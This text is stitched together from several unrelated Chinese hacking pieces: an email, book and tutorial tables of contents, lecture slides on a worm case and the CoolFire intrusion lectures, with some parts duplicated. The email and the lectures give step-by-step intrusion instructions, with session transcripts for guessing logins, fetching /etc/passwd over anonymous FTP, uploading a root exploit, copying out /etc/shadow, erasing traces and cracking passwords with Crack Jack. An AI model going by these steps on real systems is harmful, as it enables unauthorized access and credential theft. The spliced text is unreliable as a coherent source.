lwh用户的密码和它的账号一样,为lwh,而不是4nmA0M3eMD8AE 以上的知识在coolfire和root的john1.5使用说明都写过的… 先认真读读...好吗?学习黑客要讲个"悟"字…情况是千变万化的,没有很固定的方法, 黑客的各个步骤都可能用不同的方法来达成… 如果要详细的写,我可以写出几万字..所以我只能个你提示,希望你能自己来尝试和领悟, 只要有一定的基础,我所写的就是关键之处..一看就明白了… 1.get passwd (我没有用你寄来的passwd文件,仅仅匿名就得到了,这是一个漏洞!) 2.用emailcrk猜了一会…拿到了几十个密码(又是漏洞!)..但都是ftponly的shell,不能telnet 3.打开passwd文件观察为sh.csh之类shell的用户,发现有几个很可能是默认账号.. 4.telnet 到目标,试到第二个账号就有了一个shell.(漏洞) 5.这个账号居然连ls都不能用?--原来它没设搜索路径,用/bin/ls 就可以了.( /bin/命令) 6.系统为sun os 5.6,不能cc/gcc,只好上传编译好的expoilts,但这个账号又不能ftp? 7.在jiangfy的主页上有telnet上传的方法,把编译好的expoilt uuencode后传上去. 8. /bin/uudecode myfile ; /bin/chmod +x myfile 解开我的expoilt 9运行 myfile 10 .哈哈,看看提示符为 # ,(未补的漏洞),赶快 more /etc/shadow.但shadow有几百K… 11. Cp /etc/shadow /tmp/myshadow 拷贝一个到/tmp目录.chmod a+r myshadow (让任何人可读) 12.再开一个窗口,用另一个账号ftp上,get myshadow 回来 13.get完后删除myshadow和myfile,打扫战场,bye了. 14.expoilt 可到 自己找到后编译,注意对应的unix系统和版本号. ----------------------------------------------------------------------------------------------- 老师"越来越忙了,家里也越来越"穷"了,.以后长的mail没时间回了,好在你不愁没人教的:) . 但是希望你能自己多想多试,不能急于求成,这样收获才比较大.有机会netmeting,这样一次能交流的信息比较多. Bye… ------To my friends…---- ========================== | ** Do you forget … **| ========================== --the mail is from iamin--
新手学黑客攻防(入门篇)演示教学
新手学黑客攻防(入门篇)新手学黑客攻防(入门篇)内容简介随着互联网技术的不断发展,信息交流更加高效、便捷,各种新的网络功能不断涌现,网络在促进经济发展、推动社会进步和提高人们的生活质量等方面发挥着越来越重要的作用。
然而与此同时,网络的安全问题也变得日趋严重,需要引起每一个电脑用户的重视。
在网络中有一群被称为“黑客”的神秘人物。
最早黑客是指热心于计算机技术、水平高超的电脑专家,尤指程序设计人员。
但到了今天,黑客已被用于泛指那些专门利用电脑搞破坏或恶作剧的家伙。
作为一个有一定操作经验的电脑用户,读者有必要了解一些黑客的知识,通过模拟黑客的行为准则以及入侵网络的方式、方法,反过来发现自身存在的问题,做好防范工作,从而最终保证自己的数据信息和网络财产的安全。
本书共11章。
第1章介绍黑客的基础知识,包括黑客入侵的途径、入侵命令以及入侵的方式。
第2章介绍Windows 系统中存在的安全隐患和漏洞。
第3章介绍针对Windows 系统中存在的漏洞如何设置电脑,从而实现防范黑客通过漏洞攻击电脑的目的。
第4章~第6章介绍黑客从信息收集、植入木马、到最后进行远程控制与入侵的一个完整流程。
第7章~第9章介绍黑客如何对QQ、电子邮件与网页进行攻击,以及电脑用户应该怎样防范。
第10章介绍防范木马与黑客的一些小方法。
最后的第11章介绍被黑客入侵后,如何隐藏信息与创建后门。
本书采用全彩印刷,配1张多媒体教学视频光盘。
彩色印刷能使图文对比更加鲜明、直观,使学习过程更加愉悦。
多媒体教学视频让读者像看电视一样学电脑,学习效果立竿见影。
目录第1章黑客基础知识1.1 黑客的概述1.2黑客必经的两道门:IP地址与端口1.2.1 IP和IP地址1.2.2 端口的概述1.2.3 查看端口1.2.4 关闭端口和限制端口1.3 黑客常用命令1.3.1 路由与网关1.3.2 ping命令1.3.3 net命令1.3.4 telnet命令1.3.5 ftp命令1.3.6 netstat命令1.3.7 tracert命令1.3.8 ipconfig命令1.3.9 route命令1.3.10 netsh命令1.3.11 arp命令1.4 黑客入侵方式第2章Windows系统中的漏洞2.1Windows系统的安全隐患2.1.1 Windows系统漏洞产生的原因2.1.2 Windows系统漏洞的安全隐患2.2 Windows 2000系统中的漏洞2.2.1 输入法漏洞2.2.2 Unicode漏洞2.2.3 ISAPI缓冲区扩展溢出漏洞2.2.4 MS SQL Server的SA空密码漏洞2.2.5 系统管理权限漏洞2.2.6 路径优先漏洞2.2.7 NetDDE消息权限提升漏洞2.2.8 RDP拒绝服务漏洞2.2.9 域控制器拒绝服务漏洞2.2.10 事件查看器存在缓冲区溢出2.2.11 UDP套接字拒绝服务漏洞2.2.12 安全账户管理漏洞2.2.13 IIS 5.0的HTR映射远程堆溢出漏洞2.2.14 IIS 5.0的ASP缓冲溢出漏洞2.2.15 Narrator本地密码信息泄露漏洞2.2.16 SMTP认证漏洞2.2.17 IIS 5.0/5.1验证漏洞2.2.18 SQL Server的函数库漏洞2.2.19 IIS 5.0伪造Content-Length拒绝服务漏洞2.2.20 调试寄存器漏洞2.2.21 drwtsn32.exe文件漏洞2.2.22 快捷方式漏洞2.2.23 UTF漏洞2.2.24 IIS 5.0 SEARCH方法远程攻击漏洞2.2.25 LDAP漏洞2.2.26 IIS 5.0拒绝服务漏洞2.2.27 Telnet漏洞2.2.28 登录服务恢复模式空密码漏洞2.2.29 默认注册许可漏洞2.2.30 域账号锁定漏洞2.2.31 终端服务器登录缓存溢出漏洞2.2.32 ActiveX参数漏洞2.2.33 IIS 5.0 Cross-Site scripting漏洞2.2.34 组策略漏洞2.2.35 Outlook Express数字签名缓冲区溢出漏洞2.2.36 ActiveX控件漏洞2.2.37 SMB漏洞2.2.38 网络连接管理器漏洞2.3 Windows XP系统中的漏洞2.3.1 UPnP缓冲溢出漏洞2.3.2 压缩文件夹远程任意命令执行漏洞2.3.3 升级程序漏洞2.3.4 帮助和支持中心漏洞2.3.5 服务拒绝漏洞2.3.6 Windows Media Player漏洞2.3.7 热键漏洞2.3.8 RDP漏洞2.3.9 VM漏洞2.3.10 账号快速切换漏洞第3章个人计算机的安全防护策略3.1 计算机的密码设置3.1.1 设置开机登录密码3.1.2 设置待机后恢复密码3.1.3 设置屏保恢复后的密码3.2 注册表安全设置3.2.1 注册表的概述3.2.2 防止系统隐私信息被泄露3.2.3 关闭默认共享3.2.4 设置Windows的自动登录3.2.5 驱除系统中的随机启动木马3.2.6 清除恶意代码3.2.7 防止SYN洪水攻击3.3 组策略的安全设置3.3.1 组策略的概述3.3.2 重命名默认账户名3.3.3 账户锁定策略3.3.4 设置密码策略3.3.5 禁止访问注册表3.3.6 禁止访问控制面板3.3.7 隐藏桌面上的系统图标3.3.8 设置用户权限3.3.9 防止用户使用添加或删除程序3.3.10 限制使用应用程序3.4 Windows XP的安全设置3.4.1 开启Windows防火墙3.4.2 给文件加密3.4.3 锁定计算机3.4.4 给系统打补丁第4章信息搜集、嗅探与扫描4.1 信息搜集4.1.1 获取IP地址4.1.2 根据IP地址获取地理位置4.1.3 查询网站备案信息4.2 检测系统漏洞4.2.1 扫描器的概述4.2.2 搜索局域网共享资源4.2.3 使用LanExplorer搜索4.2.4 使用MBSA检测系统安全性4.3 嗅探器的使用4.3.1 嗅探器概述4.3.2 用Sniffer Portable捕获数据4.3.3 用“艾菲网页侦探”捕获网页内容4.4 端口扫描4.4.1 端口扫描的原理与分类4.4.2 使用X-Scan进行端口扫描4.4.3 使用SuperScan进行端口扫描第5章木马的入侵5.1 木马的概述5.1.1 木马的概念和结构5.1.2 木马的种类5.1.3 木马的特征5.1.4 木马的入侵方式5.1.5 木马的伪装手段5.1.6 识别木马5.1.7 防范木马的入侵5.2 捆绑木马5.2.1 使用“EXE捆绑机”捆绑木马5.2.2 其他常见的捆绑器5.2.3 网页木马生成器5.3 黑客常用的木马工具5.3.1 “冰河”木马5.3.2 “广外女生”木马第6章远程控制技术6.1 基于认证入侵6.1.1 IPC?入侵与防范6.1.2 Telnet入侵概述6.2 利用注册表入侵6.2.1 修改注册表实现远程监控6.2.2 开启远程注册表服务6.3 使用“远程控制任我行”远程控制软件6.3.1 配置“远程控制任我行”6.3.2 监视并控制远程计算机6.4 远程监视与控制6.4.1 使用“网络执法官”监控局域网6.4.2 使用QuickIP进行多点控制第7章 QQ攻防战7.1 黑客攻击QQ的常用手段7.2 利用本地信息攻击QQ7.2.1 使用“QQ聊天记录查看器”查看聊天记录7.2.2 利用本地资料破解QQ密码7.3 远程攻击QQ7.3.1 QQ强制聊天7.3.2 使用“QQ狙击手”进行IP探测7.4 保护好自己的QQ7.4.1 防止QQ密码被破译7.4.2 防范QQ炸弹7.4.3 防范IP地址被探测7.4.4 利用“QQ医生”查杀QQ木马病毒7.4.5 申请密码保护第8章电子邮件攻防战8.1 电子邮件病毒8.1.1 邮件病毒定义及特征8.1.2 识别“邮件病毒”8.1.3 防范“邮件病毒”8.2 认识电子邮件炸弹8.2.1 电子邮件炸弹的定义8.2.2 电子邮件炸弹的危害8.2.3 防范电子邮件炸弹8.3 获取电子邮箱密码的方式8.3.1 使用Web Cracker 4.0获取Web邮箱密码8.3.2 使用“流光”探测电子邮箱账号与密码第9章网页攻防战9.1 恶意代码9.1.1 恶意代码的概述9.1.2 非过滤性病毒9.2 常见的网页炸弹攻击原理与防御方法9.3 利用注册表清除恶意代码9.3.1 清除自动弹出的网页和对话框9.3.2 利用注册表还原被强行修改的IE标题栏和默认首页9.3.3 利用注册表清除网络实名9.3.4 注册表被恶意代码禁用9.4 IE浏览器的安全设置9.4.1 删除上网后的历史记录9.4.2 设置安全可靠的网页和不安全的网页9.4.3 屏蔽各种广告第10章防范木马与黑客10.1 防范IP地址和端口被探测10.1.1 设置代理服务器10.1.2 关闭端口10.1.3 配置安全策略保护端口10.2 驱逐间谍软件10.2.1 使用Ad-Aware驱逐间谍软件10.2.2 使用“安博士”检查间谍软件10.3 清除木马的常用软件10.3.1 使用“Windows进程管理器”管理进程10.3.2 使用“超级兔子”清除木马10.3.3 使用360安全卫士维护系统安全第11章信息隐藏与后门清理11.1 入侵隐藏技术11.1.1 跳板技术11.1.2 文件隐藏技术11.1.3 代理服务器11.1.4 Sock5代理跳板11.1.5 端口重定向11.2 账户隐藏技术11.2.1 利用“命令提示符”创建后门账户11.2.2 通过“注册表”创建后门账户11.2.3 清除隐藏账户11.3 其他常见的后门11.3.1 系统服务后门11.3.2 木马程序后门11.4 清除登录服务器的事件日志11.4.1 事件日志的概述11.4.2 手工清除自己计算机中的日志11.4.3 清除远程主机上的日志11.4.4 通过工具清除事件日志。
Course1
24
1990s: 计算机安全产业的形成
攻击机 172.31.4.210 VMware vSphere
蜜罐主机感染目标 172.31.4.223
8
黛蛇蠕虫案例演示过程 >>
1)启动FTP服务器Serv-U,提供黛蛇样本下载 2)启动命令控制服务器NetCat,提供批处理命令 3)执行黛蛇蠕虫中包含的uPnP漏洞渗透攻击脚本 4) 查看感染目标蜜罐主机的文件系统、任务运行 列表和系统状态 5) 利用监控网关分析工具分析由监控网关、 Sebek(系统行为监控工具)捕获的黛蛇蠕虫攻击 场景数据
9
黛蛇蠕虫事件的取证与追踪过程
IP追踪定位
“犯罪现场”取证分析 …… 定位攻击者——河南南 阳ADSL用户 FTP banner: [Evil_ Security_Team] 网络搜索及线索追踪:
Profiling
10
黛蛇蠕虫案例小结
一个典型的网络蠕虫传播场景
故事摘要:一个‖黑客‖写了个蹩脚的蠕虫,投 放到了互联网上,一个“初出校园”的博士生 帮助应急组织进行了及时处理,挽救了无辜网 民和‖黑客‖,但被‖黑客‖骂了。 2005国家计算机网络应急技术处理协调中心 《年报》重要成功案例。
11
内容
1. “黛蛇”蠕虫追踪案例 2. 黑客与黑客道 3. 网络安全攻防技术概述 4. 物理攻击与社会工程学 5. 作业1
最新黑客技术入门基础教程大全
最新黑客技术入门基础教程大全目录1 黑客简介 (2)2 保护自己电脑绝对不做黑客肉鸡 (3)3 抓肉鸡的几种方法 (5)4 防止黑客通过Explorer侵入系统 (9)5 SQL注入详解 (11)5.1 注入工具 (11)5.2 php+Mysql注入的误区 (12)5.3 简单的例子 (13)5.4 语句构造 (15)5.5 高级应用 (23)5.6 实例 (28)5.7 注入的防范 (30)5.8 我看暴库漏洞原理及规律1 (31)5.9 我看暴库漏洞原理及规律2 (34)6 跨站脚本攻击 (36)6.1 跨站脚本工具 (36)6.2 什么是XSS攻击 (37)6.3 如何寻找XSS漏洞 (37)6.4 寻找跨站漏洞 (38)6.5 如何利用 (38)6.6 XSS与其它技术的结合 (40)7 XPath注入 (40)7.1 XPath注入介绍 (40)7.2 XPath注入工具 (44)声明:文章来源大多是网上收集而来,版权归其原作者所有。
1黑客简介"黑客"(hacker)这个词通常被用来指那些恶意的安全破坏者。
关于"黑客"一词的经典定义,最初来源于麻省理工学院关于信息技术的一份文档,之后便被新闻工作者们长期使用。
但是这个在麻省理工被当做中性词汇的术语,却逐渐被新闻工作者们用在了贬义的环境,而很多人也受其影响,最终导致了"黑客"一词总是用于贬义环境。
有些人认为,我们应该接受"黑客"一词已经被用滥并且有了新的意义。
他们认为,如果不认可这种被滥用的词汇,那么将无法与那些不懂技术的人进行有效的交流。
而我仍然认为,将黑客和恶意的骇客(cracker)分开表述,对交流会更有效,比如使用"恶意的安全骇客"会更容易让对方理解我所指的对象,从而能够达到更好的沟通交流效果,也避免了对"黑客"一词的滥用。
[实用参考]从零开始学习黑客技术入门教程(基础)
最简单的黑客入门教程目录1黑客简介 (2)2保护自己电脑绝对不做黑客肉鸡 (2)3抓肉鸡的几种方法 (5)4防止黑客通过EGplorer侵入系统 (9)5SQL注入详解 (10)5.1注入工具 (11)5.2php+MPsql注入的误区 (11)5.3简单的例子 (12)5.4语句构造 (14)5.5高级应用 (22)5.6实例 (26)5.7注入的防范 (29)5.8我看暴库漏洞原理及规律1 (29)5.9我看暴库漏洞原理及规律2 (32)6跨站脚本攻击 (34)6.1跨站脚本工具 (34)6.2什么是GSS攻击 (35)6.3如何寻找GSS漏洞 (35)6.4寻找跨站漏洞 (36)6.5如何利用 (36)6.6GSS与其它技术的结合 (38)7GPath注入 (38)7.1GPath注入介绍 (38)7.2GPath注入工具 (41)声明:文章来源大多是网上收集而来,版权归其原作者所有。
1黑客简介"黑客"(hacker)这个词通常被用来指那些恶意的安全破坏者。
关于"黑客"一词的经典定义,最初来源于麻省理工学院关于信息技术的一份文档,之后便被新闻工作者们长期使用。
但是这个在麻省理工被当做中性词汇的术语,却逐渐被新闻工作者们用在了贬义的环境,而很多人也受其影响,最终导致了"黑客"一词总是用于贬义环境。
有些人认为,我们应该接受"黑客"一词已经被用滥并且有了新的意义。
他们认为,如果不认可这种被滥用的词汇,那么将无法与那些不懂技术的人进行有效的交流。
而我仍然认为,将黑客和恶意的骇客(cracker)分开表述,对交流会更有效,比如使用"恶意的安全骇客"会更容易让对方理解我所指的对象,从而能够达到更好的沟通交流效果,也避免了对"黑客"一词的滥用。
之所以要区分黑客和恶意骇客,是因为在某些情况下,我们讨论的对象是那些毫无恶意并且不会对安全防御或者用户隐私造成损害的对象,这些人只有用"黑客"这个词来描述才最贴切。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
CoolFire系列讲座第1讲作者:CoolFire [coolfires@] (2001-10-12 15:00:00) CoolHC Volume 1 By CoolFire Author E-Mail: coolfires@这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!#1 甚么是Hacking ?就是入侵电脑! 有甚么好解释的! 大部份有关介绍Hacker 的书籍或小说及文件等都有清楚的介绍, 沉迷於电脑的人... 破坏... 唉! 一大堆怪解释就是了, 最好不要成为一个"骇客", 我... 不是!#2 为甚么要Hack ?我们只是为了要解更多关於系统的技术, 入侵它,了解它是如何运作的, 试试它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操作!! 为了安全性而作革命!#3 Hack 守则1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦.恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使用!! 注意: 千万不要破坏别人的软体或资料!!2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後将它改回原状.3. 不要轻易的将你要Hack 的站台告诉你不信任的朋友.4. 不要在bbs 上谈论你Hack 的任何事情.5. 在Post 文章的时候不要使用真名.6. 正在入侵的时候, 不要随意离开你的电脑.7. 不要侵入或破坏政府机关的主机.8. 不在电话中谈论你Hack 的任何事情.9. 将你的笔记放在安全的地方.10. 想要成为Hacker 就要真正的Hacking, 读遍所有有关系统安全或系统漏洞的文件(英文快点学好)!11. 已侵入电脑中的帐号不得清除或修改.12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须维持原来系统的安全性, 不得因得到系统的控制权而将门户大开!!13. 不将你已破解的帐号分享与你的朋友.#4 破解之道1. 进入主机中2. 得到/etc/passwd3. 得到系统帐号4. 得到最高权限-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 1.进入主机有好几种方式, 可以经由Telnet (Port 23) 或SendMail (Port 25)或FTP 或WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能同时进行多项服务, 所以如果你只是要"进入" 该主机, 这些Port 都是很好的进行方向. 当然还有很多Port, 但是DayTime 的Port 你能拿它作甚么??? 我不知道, 你知道吗?!底下的示范并不是像写出来的那么容易, 只不过是要让你解如何进入, 当然其中还有很多问题, 如打错指令...... 等等的毛病... 没有出现在课堂上, 但是我为了面子.... 一定要删掉这些不堪入目的东西嘛...示范进入主机的方法: (By CoolFire)(首先要先连上某一台你已经有帐号的Telnet 主机, 当然最好是假的, 也就是Crack过的主机, 然後利用它来Crack 别的主机, 才不会被别人以逆流法查出你的所在)Digital UNIX () (ttypa)login: FakeNamePassword:Last login: Mon Dec 2 03:24:00 from 255.255.0.0(我用的是 ... 当然是假的罗, 都已经经过修改了啦!!没有这一台主机啦!! 别怕! 别怕! 以下的主机名称都是假的名称, 请同学们要记得!!)Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software (Rev. 248)Digital UNIX Chinese Support V1.2C (rev. 3)(嗯... 进来了! 开始攻击吧! 本次的目标是......)> telnet (Telnet 试试看....)Trying 111.222.255.255...Connected to .Escape character is '^]'.Password:Login incorrect(没关系, 再来!!)cool login: hinetPassword:Login incorrectcool login:(都没猜对, 这边用的是猜的方法, 今天运气好像不好)telnet> closeConnection closed.(重来, 换个Port 试试看!!)> telnet 111.222.255.255 80Trying 111.222.255.255...Connected to 111.222.255.255.Escape character is '^]'.<HTML><HEAD><TITLE>Error</TITLE></HEAD><BODY><H1>Error 400</H1>Invalid request "" (unknown method)<P><HR><ADDRESS><A HREF="">CERN-HTTPD 3.0A</A></ADDRESS></BODY></HTML>Connection closed by foreign host.(哇哩!! 连密码都没得输入, 真是..... 再来!! 要有恒心!!)(换FTP Port 试试)> ftp 111.222.255.255Connected to 111.222.255.255.220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.Name (111.222.255.255:FakeName): anonymous331 Guest login ok, send your complete e-mail address as password.Password:230-Welcome, archive user! This is an experimental FTP server. If have any 230-unusual problems, please report them via e-mail to root@230-If you do have problems, please try using a dash (-) as the first character230-of your password -- this will turn off the continuation messages that may230-be confusing your ftp client.230-230 Guest login ok, access restrictions apply.Remote system type is UNIX.Using binary mode to transfer files.(哇! 可以用anonymous 进来耶!! password 部份输入aaa@ 就好了! 不要留下足迹喔!!)ftp> ls200 PORT command successful.150 Opening ASCII mode data connection for file list.etcpubusrbinlibincomingwelcome.msg226 Transfer complete.(嗯嗯... 太好了! 进来了!! 下一个目标是.....)ftp> cd etc250 CWD command successful.ftp> get passwd (抓回来!!)200 PORT command successful.150 Opening BINARY mode data connection for passwd (566 bytes).226 Transfer complete.566 bytes received in 0.56 seconds (0.93 Kbytes/s)(喔... 这么容易吗??)ftp> !cat passwd (看看!!!)root::0:0:root:/root:/bin/bashbin:*:1:1:bin:/bin:daemon:*:2:2:daemon:/sbin:adm:*:3:4:adm:/var/adm:lp:*:4:7:lp:/var/spool/lpd:sync:*:5:0:sync:/sbin:/bin/syncshutdown:*:6:0:shutdown:/sbin:/sbin/shutdownhalt:*:7:0:halt:/sbin:/sbin/haltmail:*:8:12:mail:/var/spool/mail:news:*:9:13:news:/var/spool/news:uucp:*:10:14:uucp:/var/spool/uucp:operator:*:11:0:operator:/root:/bin/bashgames:*:12:100:games:/usr/games:man:*:13:15:man:/usr/man:postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bashftp:*:404:1::/home/ftp:/bin/bash(哇哩... 是Shadow 的... 真是出师不利.... )ftp> bye221 Goodbye.(不信邪.... 还是老话, 要有恒心....)(FTP 不行, 再Telnet 看看!!)> telnet Trying 111.222.255.255...Connected to .Escape character is '^]'.Password:Login incorrect(又猜错!!)cool login: fuckyouPassword:Last login: Mon Dec 2 09:20:07 from 205.11.122.12Linux 1.2.13.Some programming languages manage to absorb change but withstand progress.cool:~$(哇哈哈!! 哪个笨root, 用system name 作username 连password 也是system name.... 总算... 没白玩...)cool:~$ systembash: system: command not found(嗯... 这个user 的权限好像不大....)cool:~$ lscool:~$ pwd/home/fuckyoucool:~$ cd /cool:/$ lsPublic/ cdrom/ lib/ mnt/ tmp/ www/README dev/ linux* proc/ usr/bin/ etc/ local/ root/ var/boot/ home/ lost+found/ sbin/cool:/$ cd etctelnet> quit(好想睡呀!! 不玩了!! 下节课再开始....)Connection closed.> exit(走了!! 下节课在见啦!! 今天就上到这里! 老师要先下班了!!)(有学生说: 骗人! 还没有破解呀!! 胡说! 不是已经进来了吗???看看这节课上的是甚么??? ---->进入主机!! 嗯.....)-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 2.上节课抓回来一个"乱七八糟" 的/etc/passwd, 你以为我的真那么笨吗?? guest 所抓回来的能是甚么好东西?? 所以这一节课继续上次的攻击行动. 上节课我们已经"猜" 到了一个不是guest 的username 及password. 今天就以它来进入主机瞧瞧!!Digital UNIX () (ttypa)login: FakeNamePassword:Last login: Mon Dec 2 03:24:00 from 255.255.0.0Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996Digital UNIX V1.2C Worksystem Software (Rev. 248)Digital UNIX Chinese Support V1.2C (rev. 3)(嗯... 进来了! 开始攻击吧! 本次的目标是.....呵...)> telnet (Telnet 试试看.... 昨天的位址, 有作笔记吧!)> telnet Trying 111.222.255.255...Connected to .Escape character is '^]'.Password:Login incorrectcool login: fuckyouPassword: (一样输入fuckyou)Last login: Mon Dec 1 12:44:10 from Linux 1.2.13.cool:~$ cd /etccool:/etc$ lsDIR_COLORS ftpusers localtime resolv.conf HOSTNAME gateways magic rpc NETWORKING group mail.rc securetty NNTP_INEWS_DOMAIN host.conf motd sendmail.cfX11@ hosts messages/ sendmail.stXF86Config hosts.allow mtab servicesat.deny hosts.deny mtools shells bootptab hosts.equiv named.boot shutdownp csh.cshrc hosts.lpd networks snoopy/ csh.login httpd.conf nntpserver slip.hosts exports inetd.conf passwd snooptab fastboot inittab passwd.OLD syslog.conf fdprm issue passwd.old syslog.pid fstab ld.so.cache printcap ttys ftpaccess ld.so.conf profile utmp@(找寻目标..... 太乱了! 懒得找, 再来....)cool:/etc$ ls pa*passwd passwd.OLD passwd.old(果然在)cool:/etc$ more passwd(看看有没有Shadow...)root:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john(正点! 一点都没有防备!!)cool:/etc$ exitlogout(走了!.... 换FTP 上场!!)Connection closed by foreign host.> ftp Connected to .220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.Name (:66126): fuckyou331 Password required for fuckyou.Password:230 User fuckyou logged in.Remote system type is UNIX.Using binary mode to transfer files.ftp> cd /etc250 CWD command successful.ftp> get passwd200 PORT command successful.150 Opening BINARY mode data connection for passwd (350 bytes).226 Transfer complete.350 bytes received in 0.68 seconds (1.9 Kbytes/s)ftp> !cat passwdroot:acqQkJ2LoYp:0:0:root:/root:/bin/bashjohn:234ab56:9999:13:John Smith:/home/john:/bin/john(看看! 呵! 假不了!!......)ftp> bye221 Goodbye.> exit(闪人罗!! 下课!!.... 喔慢点, 还有事要说明......)passwd 的Shadow 就是把passwd 放在shadow 档中, 而你原先在第一节课所看到的这个格式的passwd 并不是真正的passwd....root::0:0:root:/root:/bin/bash因为密码的部份没有东西.... 所以拿了也没有用!! 但这一节课所拿到的东西呢, 像是这样, 有几点需要说明的, 就是它究竟代表著甚么???john:234ab56:9999:13:John Smith:/home/john:/bin/sh它以":" 分成几个栏位, 各栏位对照如下:User Name: johnPassword:234ab56User No: 9999Group No: 13Real Name: John SmithHome Dir: /home/johnShell: /bin/sh了吧! 了吧! 保留著你千辛万苦所拿到的passwd, 咱们第三节课再来告诉各位如何使用Crack Jack 把passwd 解码.... 呵呵... zzZZzZzz...-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-Crack Jack V1.4 中文使用说明(By CoolFire 12-1-1996)嗯... 该到第三课了!! 累了的同学先去喝口水吧!这一节课咱们来说说Crack Jack ! 这可是个解读/etc/passwd 的好工具喔, 不要告诉我你习惯用Brute, 拿Brute 跟Crack Jack 的速度比比看, 包准你马上投向Crack Jack 1.4 的怀抱, 但请先确定你所使用的是Crack Jack 1.4, 你可以在CoolFire 的Hacker&Mailer Page 中拿到这个版本的Crack Jack ! 这才是真正有用的版本, 速度... 对... 就是这点别人都比不上! 但还是要讲讲它的缺点... 就是只能在DOS 跟OS2 中跑, 如果在Windoz 95 上开个DOS Mode 跑, 它可是连理都不会理你的!OK! 现在切入正题! etc/passwd 拿到手了吧!! 开始罗!! 使用Crack Jack 1.4 前所需要的东西有这些[1] Crack Jack 1.4 (废话...$%^&@@) [2] /etc/passwd 档案, 你可以在Unix 系统中的/etc/ 目录中找到passwd [3] 字典档(哪里找, 自己敲... 呵ClayMore 中有一份DIC.TXT是有一千多个字的字典, 但比起我的字典可就小巫见大巫了, LetMeIn! 1.0 里面也有, 听James说 2.0 Release 的时候会有更棒的字典档含入, 期待吧!).... 使用Crack Jack 1.4 前需先确定你所使用的机器是386 含以上CPU 的! 然後最好有充足的记忆体!!开始Jack 时只要敲入JACK 即可, 它会问你PW Name... 输入你的passwd 档名, DictionaryName 输入你的字典档名, Jack 就会开始找了! 找到时会告诉你, 也会在JACK.POT 中写入它所找到的密码!! 但... 有点怪的格式! 如果找到的是具root 权限的密码, Jack 会告诉你This isJackAss... 嗯...说脏话了!! 因为使用Jack 占用的时间实在太多, 如果你中途想要停掉时只要按下Ctrl-C 即可, 别以为你前功尽弃了! 因为Jack 有个Restore 的功能, 中断时会自动存档为RESTORE, 下次要继续这次的寻找只要输入Jack -Restore:RESTORE 即可!! 当然你也可以为你的Restore 重新命名! Jack 也会找得到的... 如Ren restore restore.HNT 之後要再寻找的时後就Jack -Restore:RESTORE.HNT 即可... Jack 会很自动的Restore 前次所寻找的字串...继续帮你找下去....字典档哪里找: 我的不给你! 可以找别的Brute Force 之类的程式, 有些里面会附, 或是找找其它的Hacker 地下站看看有没有, 自己编一个, 或找个英汉字典软体将字典的部份解出来, 可能要有一点资料栏位及写程式的基础.[这一节课没有范例] 成功的案例: 找到过某家网路咖啡店的root 权限密码! Jack 好正点呀!!!所花的时间: 20 分钟左右... 但也有找了一两天也找不到的..... 呜... 骇客们! 加油吧!!继续CoolFire系列讲座第2讲作者:CoolFire [coolfires@] (2001-10-12 15:00:00) CoolHC Volume 1By CoolFire Author E-Mail: coolfires@这不是一个教学文件, 只是告诉你该如何破解系统,好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责!!话说上次CoolFire 讲到许多的Net Coffee 店, 安全性之差实在是没话说,但是过了这麽久也不见有几家改进, 可能是想让自己的电脑被别人玩弄在股掌之间吧, 但可不是每个人都像CoolFire这样温和, 如果遇到的是比较狠一点的角色, 那你的Net Coffee 可能要有一两天只卖Coffee 而没办法再Net 下去了!!继CoolHC#1 推出後, 有许多人是否已经跃跃愈试了呢?? 这次咱们不谈新的花招,用用之前所讲的再来探险一番, 当然, 这一次我照往例还是不会使用真正的Domain Name 来作教学,但是课程中的所有内容绝对属实, 当然本次攻击的对象还是.... Net Coffee Shop....**谈一下Crack Jack 猜猜密码许多人从上一次介绍Crack Jack 之後就应该已经领教过它的功力了,但是有几点需要说明的,有些人使用Jack 来帮你寻找password, 我就当你已经抓到了没有shadow 的/etc/passwd,但是为甚麽使用Jack 还是找不到呢?? 我想你应该要换个正点一点的字典档了, 因为Jack 还是根据你所提供的字典档在寻找, 如果你提供的字典本身就没有这些字,那当然连一个小小帐号的密码你都别想猜到了. 数一下你所使用的字典档中有多少字???我用的字典档有十九万多个字, 你的呢? 是不是小巫见大巫呀?? 那麽就赶快充实一下字典档再重新寻找吧!!许多人的密码都有一定的法则, 我自己写了PaSs2DiC 就是将UserName 由passwd档转成字典档的工具, 这是对一些喜欢使用UserName 